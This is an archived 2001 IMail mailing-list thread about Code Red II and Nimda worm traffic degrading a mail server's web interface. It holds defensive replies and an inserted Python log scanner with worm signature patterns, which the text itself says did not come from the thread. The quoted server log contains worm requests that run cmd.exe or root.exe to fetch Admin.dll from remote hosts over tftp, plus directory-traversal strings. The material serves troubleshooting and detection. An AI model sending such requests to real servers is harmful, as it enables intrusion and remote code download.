Sorry guys, this was posted on the wrong list by me... should have been here
rather than HKSI.  Here is the content of the email... as I think it will
help everyone here



Scot,
Actually, no, I WAS talking about a different method.  Each attack has a
specific signature in the header.  These headers can be filtered out.  Below
you will see the link to Cisco that will explain the procedure on their
routers.  Cisco routers can block any Code Red attack.  While this does not
do much for your own network as far as bandwidth is concerned, if you get
your upstream provider to do it, they can prevent DOS attacks AND filter out
unwanted requests for roo*.*xe and programs like that.

Hope this helps

Todd

http://www.cisco.com/warp/public/63/nbar_acl_codered.shtml#2
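As an added illustration of the "signature in the header" point above (this is not code from the thread, from Cisco, or from Ipswitch), here is a small log scanner that parses lines in the same layout as the IMail log quoted further down, decodes the request path twice so the Nimda "..%255c" traversal shows up as a backslash, matches the request against a set of worm signatures (cmd.exe, root.exe, Admin.dll, directory traversal), and tallies probing sources per IP. The sample lines, the signature names and the 192.0.2.x source addresses are constructed for the example; the signature patterns are my own choice, not something the thread specifies.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Constructed sample lines in the same "date time ip, , , METHOD path HTTP/x.y"
# layout as the IMail log quoted in the thread. Source addresses are from the
# 192.0.2.0/24 documentation range, not real hosts.
SAMPLE_LOG = [
    "20010918 111401 192.0.2.10, , , GET /scripts/root.exe?/c+tftp%20-i%20192.0.2.10%20GET%20Admin.dll%20Admin.dll HTTP/1.0",
    "20010918 111401 192.0.2.11, , , GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "20010918 111402 192.0.2.12, , , GET /_vti_bin/..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0",
    "20010918 111402 192.0.2.20, , , GET /index.html HTTP/1.0",
    "20010918 111403 192.0.2.21, , , POST /login HTTP/1.1",
    "this line is not in the expected format",
]

LOG_RE = re.compile(
    r"^(?P<date>\d{8}) (?P<time>\d{6}) (?P<ip>[\d.]+), , , "
    r"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/\d\.\d$"
)

# Request-line signatures of the Code Red II / Nimda probes visible in the
# quoted log. The names and patterns are a hypothetical set chosen for this
# example; the thread describes the worms' requests but not these patterns.
WORM_SIGNATURES = [
    ("cmd.exe request", re.compile(r"/cmd\.exe", re.I)),
    ("root.exe request", re.compile(r"/root\.exe", re.I)),
    ("Admin.dll fetch", re.compile(r"admin\.dll", re.I)),
    ("directory traversal", re.compile(r"\.\./|\.\.\\")),
]


def parse_line(line):
    """Split one log line into fields; return None if it does not match the layout."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    entry = m.groupdict()
    # Decode twice: Nimda's "..%255c" is a double-encoded backslash ("%5c"),
    # so a single decode would miss the traversal.
    entry["decoded_path"] = unquote(unquote(entry["path"]))
    return entry


def classify(entry):
    """Names of every signature that matches the decoded request path."""
    path = entry["decoded_path"]
    return [name for name, rx in WORM_SIGNATURES if rx.search(path)]


def scan(lines):
    """Tally worm probes per source IP; benign and unparsable lines are counted separately."""
    by_ip = Counter()
    findings = []
    benign = unparsed = 0
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            unparsed += 1
            continue
        hits = classify(entry)
        if hits:
            by_ip[entry["ip"]] += 1
            findings.append((entry["ip"], entry["path"], hits))
        else:
            benign += 1
    return {"by_ip": dict(by_ip), "findings": findings, "benign": benign, "unparsed": unparsed}


if __name__ == "__main__":
    report = scan(SAMPLE_LOG)
    for ip, path, hits in report["findings"]:
        print(f"{ip}  {', '.join(hits)}  {path}")
    print("probing sources:", sorted(report["by_ip"]))
```

Run it against a real IMail log and the "probing sources" list is what you would hand to an upstream or border filter; the per-request signature names are what a header-based filter of the kind the Cisco page describes keys on, which is why the scanner matches on the decoded request path rather than on source address alone.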



-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
Scot Desort
Sent: Friday, September 21, 2001 11:30 AM
To: [EMAIL PROTECTED]
Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!


Unfortunately, the list of hosts compromised by this worm grows every
second. I think it would be physically impossible for upstreams to
continuously monitor traffic and add the single IP address of each
compromised host for each downstream customer. Just as soon as your upstream
blocked the IPs you were being attacked from, dozens if not hundreds more
got infected and will soon begin attacking. Someone else here said the list
of compromised hosts entering a single backbone was somewhere around 42,000
and growing.

(I assume that when you said "block all those requests", you were implying
blocking by source IP, and not some other method).

--
Scot



----- Original Message -----
From: "Todd Carew" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Friday, September 21, 2001 11:23 AM
Subject: RE: [imail] DoS Attack on IMail Web Messaging?? HELP!


> Scot,
>
> I solved this problem by calling my upstream provider.  I let them know that
> I was being DoS'ed and we came up with a solution to block all of those
> requests right at the border router for our subnets.  This way not only
> do they not make it to my machines, they don't make it through my pipe at all
> and my bandwidth stays mine.  I believe all upstream providers will be
> willing to do it
>
> good luck
>
> Todd
>
>
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]On Behalf Of
> Scot Desort
> Sent: Friday, September 21, 2001 11:13 AM
> To: [EMAIL PROTECTED]
> Subject: Re: [imail] DoS Attack on IMail Web Messaging?? HELP!
>
>
> Charles:
>
> Some ideas:
>
> 1. Can you temporarily run web messaging on a different port number, like 81
> or 8383? It may be an inconvenience to inform your users, but the effect of
> the attacks would stop instantly as the Code Red I/II/Nimda requests come in
> on port 80, which would no longer be running on your server.
>
> 2. Install something like BlackIce on the server. BlackIce will pick up
> these requests and block them from reaching the server, leaving your
> WebMessaging to run and process normal port 80 requests without the load of
> the attack requests.
>
> Good luck
>
> --
> Scot
>
>
> ----- Original Message -----
> From: "Charles Short" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Friday, September 21, 2001 10:29 AM
> Subject: [imail] DoS Attack on IMail Web Messaging?? HELP!
>
>
>
>
> Hello,
>
>   I know this message is long, but I called Ipswitch Support twice on
> Wednesday about a problem I am having with my IMail Server and the phone
> support I have gotten has not addressed my issue here and I need all the
> help I can get right now. I am running 7.03 HF1 on NT4 Server with SP6a. I
> am only running IMail on this machine. No IIS or other server programs.
>
>
>
>   We started seeing problems on Tuesday like everyone else, but we are
> running IMail on a server by itself... No IIS. I am seeing a lot of
> malformed header requests in the logs like the Code Red I & II virus does to
> IIS servers and -- this is the odd part -- some BRO*.tmp files in my spool
> directory that are most definitely being caused by people browsing WebMail.
> It is causing web messaging to crawl, but other than that I have not seen
> what everyone else seems to be seeing with the Nimda virus. No other
> characteristics of the Nimda virus at all. I honestly do not believe that we
> have been infected...
>
>
>
> Here is a snippet from the logs...
>
> ------------------------------
> 20010918 111401 208.180.242.21, , , GET /scripts/root.exe?/c+tftp%20-i%20208.180.242.21%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010918 111401 208.234.121.72, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.234.120.89%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
> 20010918 111401 208.234.121.72, , , GET /MSADC/Admin.dll HTTP/1.0
> 20010918 111401 205.218.122.146, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20205.218.122.146%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> 20010918 111401 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0
> 20010918 111402 205.218.55.2, , , GET /scripts/Admin.dll HTTP/1.0
> 20010918 111402 208.168.64.117, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.64.117%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0
> 20010918 111402 208.27.235.69, , , GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.27.235.69%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> 20010918 111402 205.197.162.130, , , GET /MSADC/root.exe?/c+tftp%20-i%20205.197.162.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010918 111402 208.217.166.229, , , GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 20010918 111402 208.168.189.178, , , GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.168.189.178%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> 20010918 111402 208.177.252.132, , , GET /MSADC/root.exe?/c+tftp%20-i%20208.177.252.132%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> 20010918 111402 208.234.121.72, , , GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0
> 20010918 111402 208.168.171.3, , , GET /scripts/root.exe?/c+tftp%20-i%20208.168.171.12%20GET%20Admin.dll%20Admin.dll HTTP/1.0
> ------------------------------
>
>   When I called the other day the assumption was that it was the Nimda virus
> and the Ipswitch support guys said to run a virus program and reload the web
> template files to fix it and that has done nothing at all to help. I even
> went ahead and made the upgrade from 6.06 to v.7.03 Wednesday night and no
> progress. I have all of the virus definitions for Norton and I've done
> SEVERAL system scans with Norton, House Call and the FIX_NIMDA.EXE program
> from Trend Micro and all came up empty handed. I just can't believe that the
> Nimda has gotten into our system... Is anyone else seeing these BRO*.tmp
> files or is it just me?
>
>
>
>   This seems to be a problem specific to IMail's Web Messaging program not
> properly filtering out these malformed requests. When Web Messaging is off,
> the server runs like a dream. It is one thing to patch an IIS server with a
> patch from the product vendor, but I honestly don't have a clue as to what
> else I can do to stop this DoS attack from happening on my IMail box without
> implementing a firewall system for that server. I am seeing a ton of
> incoming traffic in our T1 logs so I know that it is coming in from the
> outside, but what I need to know is what can I do to make IMail filter out
> these requests? Help please.
>
>
>
> Charles Short
> [EMAIL PROTECTED]
> Systems Administrator
> Orotech
> Web Services
> http://www.orotech.net
> 910.350.7980 voice
> 910.350.7976 fax
>
>
>
>
>
>
> ______________________________________________________________________
> The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> To Manage your Subscription......... http://humankindsystems.com/lists
>
>
>
>









----- Copy of Original Message(s): -----


>>When Web Messaging is off, the server runs like a dream. It is one thing
>>to patch an IIS server with a patch from the product vendor, but I
>>honestly don't have a clue as to what else I can do to stop this DoS
>>attack from happening on my IMail box without implementing a firewall
>>system for that server.

R> That's what you have to do.  No software can prevent a DoS attack that is
R> simply flooding the server with requests.

R>                                                     -Scott


Please visit http://www.ipswitch.com/support/mailing-lists.html
to be removed from this list.

An Archive of this list is available at:
http://www.mail-archive.com/imail_forum%40list.ipswitch.com/

